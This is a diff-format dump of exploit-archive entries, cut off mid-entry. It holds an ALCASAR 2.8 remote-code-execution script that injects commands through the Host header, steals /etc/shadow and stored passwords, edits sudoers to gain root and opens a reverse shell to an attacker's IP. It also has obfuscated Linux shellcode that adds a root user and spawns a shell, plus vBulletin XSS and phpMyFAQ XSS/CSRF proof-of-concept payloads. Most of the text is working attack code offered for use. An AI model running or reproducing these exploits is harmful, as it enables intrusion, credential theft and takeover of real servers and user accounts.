# % python alcasar-2.8_rce.py alcasar.localdomain "alcasar-version.sh"
|
||||
#
|
||||
# [+] Hello, first here are some passwords for you:
|
||||
# Password to protect the boot menu (GRUB) : cV9eEz1g
|
||||
# Name and password of Mysql/mariadb administrator : root / FvYPr7b3
|
||||
# Name and password of Mysql/mariadb user : radius / oRNln64j
|
||||
# Shared secret between the script 'intercept.php' and coova-chilli : b9Rj34jz
|
||||
# Shared secret between coova-chilli and FreeRadius : 7tIrnkJu
|
||||
#
|
||||
# root:$2a$08$Aw4yIxQIUJ0taDjiXKSRYu6zZB5eUcbZ4445vo1157AdeGSfe1XuC:16319:0:99999:7:::
|
||||
#
|
||||
# [...]
|
||||
#
|
||||
# admin:alcasar.localdomain:49b8642b4646a4afa38cda065f76ce0e
|
||||
#
|
||||
# username value
|
||||
# user $1$passwd$qr0Ajhr12fZ475a2qAZ.H.
|
||||
#
|
||||
# [-] whoami (should be apache):
|
||||
# uid=495(apache) gid=492(apache) groups=492(apache)
|
||||
#
|
||||
# [+] On the way to the uid 0...
|
||||
# [-] Got root?
|
||||
# uid=0(root) gid=0(root) groups=0(root)
|
||||
#
|
||||
# [+] Your command Sir:
|
||||
# The Running version (2.8) is up to date
|
||||
#
|
||||
#
|
||||
####
|
||||
|
||||
import sys, os, re, httplib
|
||||
|
||||
class PWN_Alcasar:
|
||||
|
||||
def __init__(self, host):
|
||||
self.host = host
|
||||
self.root = False
|
||||
|
||||
def exec_cmd(self, cmd, output=False):
|
||||
tag = os.urandom(4).encode('hex')
|
||||
|
||||
cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
|
||||
if self.root:
|
||||
cmd = 'sudo %s' % cmd
|
||||
|
||||
headers = {
|
||||
'host' : 'aAaAa index.php;echo %s;echo %s|base64 -d -w0|sh|base64 -w0;#' % (tag, cmd.encode('base64').replace('\n',''))
|
||||
}
|
||||
|
||||
c = httplib.HTTPConnection(self.host)
|
||||
c.request('GET', '/index.php', '', headers)
|
||||
r = c.getresponse()
|
||||
data = r.read()
|
||||
c.close()
|
||||
|
||||
if data.find(tag) != -1:
|
||||
m = re.search(r'%s, (.*)\s</div>' % tag, data)
|
||||
if m:
|
||||
data = m.group(1).decode('base64')
|
||||
if output:
|
||||
print data
|
||||
return data
|
||||
return None
|
||||
|
||||
def read_file(self, filepath, output=True):
|
||||
return self.exec_cmd('sudo openssl base64 -in %s -A|base64 -d' % filepath, output=output)
|
||||
|
||||
def read_passwords(self):
|
||||
self.read_file('/root/ALCASAR-passwords.txt')
|
||||
self.read_file('/etc/shadow')
|
||||
self.read_file('/usr/local/etc/digest/key_all')
|
||||
self.read_file('/usr/local/etc/digest/key_admin')
|
||||
self.read_file('/usr/local/etc/digest/key_backup')
|
||||
self.read_file('/usr/local/etc/digest/key_manager')
|
||||
self.read_file('/usr/local/etc/digest/key_only_admin')
|
||||
self.read_file('/usr/local/etc/digest/key_only_backup')
|
||||
self.read_file('/usr/local/etc/digest/key_only_manager')
|
||||
alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
|
||||
if alcasar_mysql:
|
||||
m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
|
||||
if m:
|
||||
radiuspwd = m.group(1)
|
||||
sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
|
||||
self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)
|
||||
|
||||
def edit_sudoers(self):
|
||||
self.exec_cmd('sudo openssl base64 -in /etc/sudoers -out /tmp/sudoers.b64')
|
||||
self.exec_cmd('openssl base64 -d -in /tmp/sudoers.b64 -out /tmp/sudoers')
|
||||
self.exec_cmd('sed -i s/BL,NF/BL,ALL,NF/g /tmp/sudoers')
|
||||
self.exec_cmd('sudo openssl base64 -in /tmp/sudoers -out /tmp/sudoers.b64')
|
||||
self.exec_cmd('sudo openssl base64 -d -in /tmp/sudoers.b64 -out /etc/sudoers')
|
||||
self.exec_cmd('sudo rm -f /tmp/sudoers*')
|
||||
self.root = True
|
||||
|
||||
def reverse_shell(self, rip, rport='80'):
|
||||
payload = 'import socket,subprocess,os;'
|
||||
payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
|
||||
payload += 's.connect((\'%s\',%s));' % (rip, rport)
|
||||
payload += 'os.dup2(s.fileno(),0);'
|
||||
payload += 'os.dup2(s.fileno(),1);'
|
||||
payload += 'os.dup2(s.fileno(),2);'
|
||||
payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
|
||||
return self.exec_cmd('python -c "%s"' % payload)
|
||||
|
||||
def usage():
|
||||
print 'Usage: %s host command (ip) (port)' % sys.argv[0]
|
||||
print ' "command" can be a shell command or "reverseshell"'
|
||||
sys.exit(0)
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
if len(sys.argv) < 3:
|
||||
usage()
|
||||
|
||||
cmd = sys.argv[2]
|
||||
if cmd == 'reverseshell':
|
||||
if len(sys.argv) < 5:
|
||||
print '[!] Need IP and port for the reverse shell...'
|
||||
sys.exit(0)
|
||||
rip = sys.argv[3]
|
||||
rport = sys.argv[4] # 80 is a good one...
|
||||
|
||||
exploit = PWN_Alcasar(sys.argv[1])
|
||||
print '[+] Hello, first here are some passwords for you:'
|
||||
exploit.read_passwords()
|
||||
print '[-] whoami (should be apache):'
|
||||
exploit.exec_cmd('id', output=True)
|
||||
print '[+] On the way to the uid 0...'
|
||||
exploit.edit_sudoers()
|
||||
print '[-] Got root?'
|
||||
exploit.exec_cmd('id', output=True)
|
||||
if cmd == 'reverseshell':
|
||||
print '[+] You should now have a shell on %s:%s' % (rip, rport)
|
||||
exploit.reverse_shell(rip, rport)
|
||||
else:
|
||||
print '[+] Your command Sir:'
|
||||
exploit.exec_cmd(cmd, output=True)
|
||||
sys.exit(1)
|
209
platforms/linux/shellcode/34592.c
Executable file
209
platforms/linux/shellcode/34592.c
Executable file
|
@ -0,0 +1,209 @@
|
|||
/*
|
||||
#Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
|
||||
#length: 521 bytes
|
||||
#Date: 8 September 2018
|
||||
#Author: Ali Razmjoo
|
||||
#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
|
||||
|
||||
|
||||
|
||||
Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
|
||||
Thanks to Jonathan Salwan
|
||||
|
||||
|
||||
chmod('/etc/passwd',777)
|
||||
chmod('/etc/shadow',777)
|
||||
open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
|
||||
setreuid() , execve('/bin/sh')
|
||||
|
||||
|
||||
root@g3n3rall:~/Desktop/xpl# objdump -d f.o
|
||||
|
||||
f.o: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
00000000 <_start>:
|
||||
0: 31 c0 xor %eax,%eax
|
||||
2: 31 db xor %ebx,%ebx
|
||||
4: 31 c9 xor %ecx,%ecx
|
||||
6: 31 d2 xor %edx,%edx
|
||||
8: bb 59 45 4f 53 mov $0x534f4559,%ebx
|
||||
d: ba 33 36 38 37 mov $0x37383633,%edx
|
||||
12: 31 d3 xor %edx,%ebx
|
||||
14: 53 push %ebx
|
||||
15: c1 eb 08 shr $0x8,%ebx
|
||||
18: 53 push %ebx
|
||||
19: bb 7a 46 59 45 mov $0x4559467a,%ebx
|
||||
1e: ba 55 36 38 36 mov $0x36383655,%edx
|
||||
23: 31 d3 xor %edx,%ebx
|
||||
25: 53 push %ebx
|
||||
26: bb 67 58 45 4e mov $0x4e455867,%ebx
|
||||
2b: ba 48 3d 31 2d mov $0x2d313d48,%edx
|
||||
30: 31 d3 xor %edx,%ebx
|
||||
32: 53 push %ebx
|
||||
33: 89 e3 mov %esp,%ebx
|
||||
35: 68 41 41 ff 01 push $0x1ff4141
|
||||
3a: 59 pop %ecx
|
||||
3b: c1 e9 08 shr $0x8,%ecx
|
||||
3e: c1 e9 08 shr $0x8,%ecx
|
||||
41: 6a 0f push $0xf
|
||||
43: 58 pop %eax
|
||||
44: cd 80 int $0x80
|
||||
46: bb 53 49 57 4a mov $0x4a574953,%ebx
|
||||
4b: ba 39 2d 38 3d mov $0x3d382d39,%edx
|
||||
50: 31 d3 xor %edx,%ebx
|
||||
52: c1 eb 08 shr $0x8,%ebx
|
||||
55: 53 push %ebx
|
||||
56: bb 6d 47 45 58 mov $0x5845476d,%ebx
|
||||
5b: ba 42 34 2d 39 mov $0x392d3442,%edx
|
||||
60: 31 d3 xor %edx,%ebx
|
||||
62: 53 push %ebx
|
||||
63: bb 6e 54 49 57 mov $0x5749546e,%ebx
|
||||
68: ba 41 31 3d 34 mov $0x343d3141,%edx
|
||||
6d: 31 d3 xor %edx,%ebx
|
||||
6f: 53 push %ebx
|
||||
70: 89 e3 mov %esp,%ebx
|
||||
72: 68 41 41 ff 01 push $0x1ff4141
|
||||
77: 59 pop %ecx
|
||||
78: c1 e9 08 shr $0x8,%ecx
|
||||
7b: c1 e9 08 shr $0x8,%ecx
|
||||
7e: 6a 0f push $0xf
|
||||
80: 58 pop %eax
|
||||
81: cd 80 int $0x80
|
||||
83: bb 73 47 4e 51 mov $0x514e4773,%ebx
|
||||
88: ba 32 34 39 35 mov $0x35393432,%edx
|
||||
8d: 31 d3 xor %edx,%ebx
|
||||
8f: c1 eb 08 shr $0x8,%ebx
|
||||
92: 53 push %ebx
|
||||
93: bb 59 44 56 44 mov $0x44564459,%ebx
|
||||
98: ba 76 34 37 37 mov $0x37373476,%edx
|
||||
9d: 31 d3 xor %edx,%ebx
|
||||
9f: 53 push %ebx
|
||||
a0: bb 4e 58 59 51 mov $0x5159584e,%ebx
|
||||
a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx
|
||||
aa: 31 d3 xor %edx,%ebx
|
||||
ac: 53 push %ebx
|
||||
ad: 89 e3 mov %esp,%ebx
|
||||
af: 68 41 41 01 04 push $0x4014141
|
||||
b4: 59 pop %ecx
|
||||
b5: c1 e9 08 shr $0x8,%ecx
|
||||
b8: c1 e9 08 shr $0x8,%ecx
|
||||
bb: 6a 05 push $0x5
|
||||
bd: 58 pop %eax
|
||||
be: cd 80 int $0x80
|
||||
c0: 89 c3 mov %eax,%ebx
|
||||
c2: 6a 04 push $0x4
|
||||
c4: 58 pop %eax
|
||||
c5: 68 41 73 68 0a push $0xa687341
|
||||
ca: 59 pop %ecx
|
||||
cb: c1 e9 08 shr $0x8,%ecx
|
||||
ce: 51 push %ecx
|
||||
cf: b9 57 67 57 58 mov $0x58576757,%ecx
|
||||
d4: ba 39 48 35 39 mov $0x39354839,%edx
|
||||
d9: 31 d1 xor %edx,%ecx
|
||||
db: 51 push %ecx
|
||||
dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx
|
||||
e1: ba 74 4b 38 38 mov $0x38384b74,%edx
|
||||
e6: 31 d1 xor %edx,%ecx
|
||||
e8: 51 push %ecx
|
||||
e9: b9 47 57 56 42 mov $0x42565747,%ecx
|
||||
ee: ba 35 38 39 36 mov $0x36393835,%edx
|
||||
f3: 31 d1 xor %edx,%ecx
|
||||
f5: 51 push %ecx
|
||||
f6: b9 61 70 51 4e mov $0x4e517061,%ecx
|
||||
fb: ba 2d 39 6b 61 mov $0x616b392d,%edx
|
||||
100: 31 d1 xor %edx,%ecx
|
||||
102: 51 push %ecx
|
||||
103: b9 48 58 70 74 mov $0x74705848,%ecx
|
||||
108: ba 72 68 4a 35 mov $0x354a6872,%edx
|
||||
10d: 31 d1 xor %edx,%ecx
|
||||
10f: 51 push %ecx
|
||||
110: b9 76 45 56 46 mov $0x46564576,%ecx
|
||||
115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx
|
||||
11a: 31 d1 xor %edx,%ecx
|
||||
11c: 51 push %ecx
|
||||
11d: 68 66 77 55 57 push $0x57557766
|
||||
122: 68 68 70 31 50 push $0x50317068
|
||||
127: 68 7a 59 65 41 push $0x4165597a
|
||||
12c: 68 41 61 41 51 push $0x51416141
|
||||
131: 68 49 38 75 74 push $0x74753849
|
||||
136: 68 50 4d 59 68 push $0x68594d50
|
||||
13b: 68 54 42 74 7a push $0x7a744254
|
||||
140: 68 51 2f 38 54 push $0x54382f51
|
||||
145: 68 45 36 6d 67 push $0x676d3645
|
||||
14a: 68 76 50 2e 73 push $0x732e5076
|
||||
14f: 68 4e 58 52 37 push $0x3752584e
|
||||
154: 68 39 4b 55 48 push $0x48554b39
|
||||
159: 68 72 2f 59 42 push $0x42592f72
|
||||
15e: 68 56 78 4b 47 push $0x474b7856
|
||||
163: 68 39 55 66 5a push $0x5a665539
|
||||
168: 68 46 56 6a 68 push $0x686a5646
|
||||
16d: 68 46 63 38 79 push $0x79386346
|
||||
172: 68 70 59 6a 71 push $0x716a5970
|
||||
177: 68 77 69 53 68 push $0x68536977
|
||||
17c: 68 6e 54 67 54 push $0x5467546e
|
||||
181: 68 58 4d 69 37 push $0x37694d58
|
||||
186: 68 2f 41 6e 24 push $0x246e412f
|
||||
18b: 68 70 55 6e 4d push $0x4d6e5570
|
||||
190: 68 24 36 24 6a push $0x6a243624
|
||||
195: b9 73 61 74 67 mov $0x67746173,%ecx
|
||||
19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx
|
||||
19f: 31 d1 xor %edx,%ecx
|
||||
1a1: 51 push %ecx
|
||||
1a2: 89 e1 mov %esp,%ecx
|
||||
1a4: ba 41 41 41 7f mov $0x7f414141,%edx
|
||||
1a9: c1 ea 08 shr $0x8,%edx
|
||||
1ac: c1 ea 08 shr $0x8,%edx
|
||||
1af: c1 ea 08 shr $0x8,%edx
|
||||
1b2: cd 80 int $0x80
|
||||
1b4: 31 c0 xor %eax,%eax
|
||||
1b6: b0 46 mov $0x46,%al
|
||||
1b8: 31 db xor %ebx,%ebx
|
||||
1ba: 31 c9 xor %ecx,%ecx
|
||||
1bc: cd 80 int $0x80
|
||||
1be: 31 c0 xor %eax,%eax
|
||||
1c0: b0 46 mov $0x46,%al
|
||||
1c2: 31 db xor %ebx,%ebx
|
||||
1c4: 31 c9 xor %ecx,%ecx
|
||||
1c6: cd 80 int $0x80
|
||||
1c8: 68 52 55 48 42 push $0x42485552
|
||||
1cd: 68 52 51 49 43 push $0x43495152
|
||||
1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx
|
||||
1d7: ba 66 38 31 35 mov $0x35313866,%edx
|
||||
1dc: 31 d1 xor %edx,%ecx
|
||||
1de: 51 push %ecx
|
||||
1df: b9 55 55 54 57 mov $0x57545555,%ecx
|
||||
1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx
|
||||
1e9: 31 d1 xor %edx,%ecx
|
||||
1eb: 51 push %ecx
|
||||
1ec: 89 e3 mov %esp,%ebx
|
||||
1ee: 31 c0 xor %eax,%eax
|
||||
1f0: 88 43 07 mov %al,0x7(%ebx)
|
||||
1f3: 89 5b 08 mov %ebx,0x8(%ebx)
|
||||
1f6: 89 43 0c mov %eax,0xc(%ebx)
|
||||
1f9: b0 0b mov $0xb,%al
|
||||
1fb: 8d 4b 08 lea 0x8(%ebx),%ecx
|
||||
1fe: 8d 53 0c lea 0xc(%ebx),%edx
|
||||
201: cd 80 int $0x80
|
||||
203: b0 01 mov $0x1,%al
|
||||
205: b3 01 mov $0x1,%bl
|
||||
207: cd 80 int $0x80
|
||||
root@g3n3rall:~/Desktop/xpl#
|
||||
|
||||
|
||||
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
|
||||
int main(void)
|
||||
{
|
||||
|
||||
fprintf(stdout,"Length: %d\n\n",strlen(sc));
|
||||
|
||||
(*(void(*)()) sc)();
|
||||
|
||||
}
|
118
platforms/php/webapps/34579.txt
Executable file
118
platforms/php/webapps/34579.txt
Executable file
|
@ -0,0 +1,118 @@
|
|||
#Title: vBulletin 5.1.X - Cross Site Scripting
|
||||
#Date: 05.09.14
|
||||
#Version: => 5.1.2 (Latest ATM)
|
||||
#Vendor: vbulletin.com
|
||||
#Contact: smash [at] devilteam.pl
|
||||
|
||||
|
||||
1) Agenda
|
||||
|
||||
Latest vBulletin forum software suffers on persistent cross site scripting vulnerability, which most likely can be used against every user, such as administrator. Vulnerability is located at user profile page and will be executed whenever someone will visit it.
|
||||
|
||||
Solution - proper filtration of image title value, in this case, it's about POST title_13 parameter.
|
||||
|
||||
|
||||
2) Vulnerability
|
||||
|
||||
First step to reproduce the vulnerability, is to create a user account. By then, you should visit profile of the victim.
|
||||
|
||||
Let's take as example following address:
|
||||
http://vbulletin/member/2-victim
|
||||
|
||||
1. Click 'Share photo' (camera icon), pick any image you like.
|
||||
|
||||
2. You may add comment about photo, all you need to do is to add js payload.
|
||||
|
||||
As comment, use something like - huh" onmouseover=alert(666) xss="
|
||||
|
||||
Request:
|
||||
POST /ajax/render/editor_gallery_photoblock HTTP/1.1
|
||||
Host: vbulletin
|
||||
|
||||
photocount=1&photos%5B0%5D%5Bfiledataid%5D=13&photos%5B0%5D%5Btitle%5D=cool%22+onmouseover%3Dalert(666)+xssed%3D%22&securitytoken=[TOKEN]
|
||||
|
||||
3. Send image by clicking on 'Post' button.
|
||||
|
||||
Request:
|
||||
POST /create-content/gallery HTTP/1.1
|
||||
Host: vbulletin
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=---------------------------18897880557155952661558219659
|
||||
Content-Length: 1558
|
||||
|
||||
-----------------------------18897880557155952661558219659
|
||||
Content-Disposition: form-data; name="securitytoken"
|
||||
|
||||
1409922799-a28bf50b7ee16f6bfc2b7c652946c366e25574d5
|
||||
-----------------------------18897880557155952661558219659
|
||||
Content-Disposition: form-data; name="text"
|
||||
|
||||
|
||||
-----------------------------18897880557155952661558219659
|
||||
Content-Disposition: form-data; name="files"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
-----------------------------18897880557155952661558219659
|
||||
Content-Disposition: form-data; name="uploadFrom"
|
||||
|
||||
|
||||
-----------------------------18897880557155952661558219659
|
||||
Content-Disposition: form-data; name="file"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
-----------------------------18897880557155952661558219659
|
||||
Content-Disposition: form-data; name="filedataid[]"
|
||||
|
||||
13
|
||||
-----------------------------18897880557155952661558219659
|
||||
Content-Disposition: form-data; name="title_13"
|
||||
|
||||
cool" onmouseover=alert(666) xssed="
|
||||
-----------------------------18897880557155952661558219659
|
||||
Content-Disposition: form-data; name="uploadFrom"
|
||||
|
||||
|
||||
-----------------------------18897880557155952661558219659
|
||||
Content-Disposition: form-data; name="securitytoken"
|
||||
|
||||
[TOKEN]
|
||||
-----------------------------18897880557155952661558219659
|
||||
Content-Disposition: form-data; name="parentid"
|
||||
|
||||
8
|
||||
-----------------------------18897880557155952661558219659
|
||||
Content-Disposition: form-data; name="setfor"
|
||||
|
||||
5
|
||||
-----------------------------18897880557155952661558219659--
|
||||
|
||||
4. Done
|
||||
|
||||
At this point, victim should be noticed about new activity via 'Messages' tab:
|
||||
"attacker has left you a visitor message"
|
||||
|
||||
Basically, you may use this XSS against any profile.
|
||||
|
||||
Now, whenever someone will visit profile of victim (ie. http://vbulletin/member/2-victim), he should notice image you uploaded. In this case, js is executed while 'onmouseover', so victim need to click on image.
|
||||
|
||||
When victim will click on image, js will be executed, and popup will appear.
|
||||
|
||||
Request:
|
||||
GET /filedata/gallery?nodeid=31&startIndex=0&securitytoken=[TOKEN] HTTP/1.1
|
||||
Host: vbulletin
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-Type: application/json; charset=UTF-8
|
||||
|
||||
{"photos":[{"title":"cool\" onmouseover=alert(666) xssed=\"","url":"http:\/\/vbulletin\/filedata\/fetch?photoid=33","thumb":"vbulletin\/filedata\/fetch?photoid=33&thumb=1","links":"Photos By <a href=\"vbulletin\/member\/2-victim\">victim.victim@tlen.pl<\/a> in <a href=\"javascript:$('#slideshow-dialog').dialog('close');void(0);\">No Title<\/a><br \/>\n"}]}
|
||||
|
||||
|
||||
3) TL;DR
|
||||
|
||||
- Visit victim profile
|
||||
- Upload any image
|
||||
- XSS in title (asdf" onmouseover=alert(666) xss=")
|
||||
- Send
|
207
platforms/php/webapps/34580.txt
Executable file
207
platforms/php/webapps/34580.txt
Executable file
|
@ -0,0 +1,207 @@
|
|||
#Title: phpMyFAQ 2.8.X - Multiple Vulnerabilities
|
||||
#Vendor: phpmyfaq.de
|
||||
#Date: 04.09.19
|
||||
#Version: >= 2.8.12 (Latest ATM)
|
||||
#Tested on: Apache 2.2 / PHP 5.4 / Linux
|
||||
#Contact: smash [at] devilteam.pl
|
||||
|
||||
|
||||
1) Persistent XSS
|
||||
|
||||
Administrator is able to view information about specific user session in 'Statistic' tab. Over there, you may find informations such as user ip, refferer and user agent.
|
||||
|
||||
For example, to view informations about session with ID 1, you need visit following address:
|
||||
http://localhost/phpmyfaq/admin/?action=viewsession&id=1
|
||||
|
||||
Refferer and User Agent variables are not filtered, which allows attacker to inject javascript via those parameters. All you need to do, is to perform particular HTTP request which will contain javascript. For example, if you will produce hundrends of those request, there will be hundrends of Persistent XSS - Victim only needs to visit any of them.
|
||||
|
||||
PoC:
|
||||
|
||||
<?php
|
||||
|
||||
$ch =curl_init("http://localhost/phpmyfaq/index.php");
|
||||
curl_setopt($ch,CURLOPT_USERAGENT,'<script>alert(666)</script>');
|
||||
curl_setopt($ch, CURLOPT_REFERER, '<script>alert(123)</script>');
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
Vuln (viewsession):
|
||||
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>2014-09-04 02:22:04</td>
|
||||
<td>new_session (0)</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Referer:</td>
|
||||
<td>
|
||||
<a href="<script>alert(123)</script>" target="_blank">
|
||||
<script>alert(123)</script> </a>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Browser:</td>
|
||||
<td><script>alert(666)</script></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>IP-Address:</td>
|
||||
<td>::1</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
|
||||
|
||||
|
||||
2) Remote FAQ Disclosure
|
||||
|
||||
Administrator is able to view or download FAQ data using few extensions (xhtml, xml, pdf). Because of no user restrictions, attacker may reproduce this vulnerability to perform those actions even without having an account.
|
||||
|
||||
- Download
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/phpmyfaq/admin/?action=exportfile" method="POST">
|
||||
<input type="hidden" name="catid" value="0" />
|
||||
<input type="hidden" name="downwards" value="1" />
|
||||
<input type="hidden" name="type" value="xml" />
|
||||
<input type="hidden" name="dispos" value="attachment" />
|
||||
<input type="hidden" name="submitExport" value="" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
- View
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/phpmyfaq/admin/?action=exportfile" method="POST">
|
||||
<input type="hidden" name="catid" value="0" />
|
||||
<input type="hidden" name="downwards" value="1" />
|
||||
<input type="hidden" name="type" value="xml" />
|
||||
<input type="hidden" name="dispos" value="inline" />
|
||||
<input type="hidden" name="submitExport" value="" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
3) CSRF
|
||||
|
||||
- Edit user credentials (login/mail)
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/phpmyfaq/admin/?action=user&user_action=update_data" method="POST">
|
||||
<input type="hidden" name="user_id" value="1" />
|
||||
<input type="hidden" name="user_status" value="active" />
|
||||
<input type="hidden" name="display_name" value="haked" />
|
||||
<input type="hidden" name="email" value="victim@vic.tim" />
|
||||
<input type="hidden" name="last_modified" value="undefined" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
By then, you may generate new password for victim using 'Forgot password' option - just provide your email so you can grab it.
|
||||
|
||||
|
||||
- Delete user
|
||||
|
||||
http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=user&ajaxaction=delete_user&user_id=1
|
||||
|
||||
|
||||
- Delete category
|
||||
|
||||
http://localhost/phpmyfaq/admin/?action=deletecategory&cat=1&catlang=en
|
||||
|
||||
|
||||
- Delete session (month)
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/phpmyfaq/admin/?action=viewsessions" method="POST">
|
||||
<input type="hidden" name="month" value="092014" />
|
||||
<input type="hidden" name="statdelete" value="" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
- Delete logs older than 30 days
|
||||
|
||||
http://localhost/phpmyfaq/admin/?action=deleteadminlog
|
||||
|
||||
|
||||
- Add stopword
|
||||
|
||||
http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=config&ajaxaction=save_stop_word&stopword=lolwut&stopwords_lang=en
|
||||
|
||||
|
||||
- Edit configuration
|
||||
|
||||
Affected:
|
||||
Main configuration
|
||||
FAQ records configuration
|
||||
Search
|
||||
Security configuration
|
||||
Spam control center
|
||||
Social network configuration
|
||||
|
||||
PoC:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/phpmyfaq/admin/?action=config&config_action=saveConfig" method="POST">
|
||||
<input type="hidden" name="edit[main.language]" value="language_en.php" />
|
||||
<input type="hidden" name="edit[main.languageDetection]" value="true" />
|
||||
<input type="hidden" name="edit[main.titleFAQ]" value="phpMyFAQ Codename Perdita" />
|
||||
<input type="hidden" name="edit[main.currentVersion]" value="2.8.12" />
|
||||
<input type="hidden" name="edit[main.metaDescription]" value="lolwat" />
|
||||
<input type="hidden" name="edit[main.metaKeywords]" value="" />
|
||||
<input type="hidden" name="edit[main.metaPublisher]" value="Whatever" />
|
||||
